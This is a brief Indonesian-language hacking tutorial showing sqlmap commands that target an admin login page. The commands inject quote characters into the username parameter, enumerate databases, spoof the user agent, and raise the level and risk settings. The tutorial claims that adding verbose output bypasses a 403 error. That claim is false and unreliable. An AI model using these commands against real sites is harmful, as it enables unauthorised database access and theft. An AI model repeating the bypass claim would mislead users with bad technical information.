Basic Command Sqlmap:
sqlmap.py -u site.com/admin/login --data=”username=a%27&password=a%27&redirect=&submitted=submitted” -p “username” --level 5 --dbs --random-agentOutput:
[20:44:30] [WARNING] heuristic (basic) test shows that POST parameter ‘username’ might not be injectable
Bypass Command:
sqlmap.py -u site.com/admin/login --data=”username=a%27&password=a%27&redirect=&submitted=submitted” -p “username” --level 5 --dbs --random-agent -v 3Output:
Dengan menambahkan verbose kita dapat membypass Error 403 (Not Acceptable). Untuk kasus lain kalian juga bisa mencoba cara ini. sesuaikan juga --level --risk untuk menambah tingkat keberhasilan saat melakukan SQLinjection
Mungkin itu saja untuk artikel kali ini, jika ada yang kurang dipahami atau ingin bertanya silahkan menghubungi kami via fanspage.
Terimakasih dan semoga bermanfaat :)
Thx To: Rexha - Sorong666etar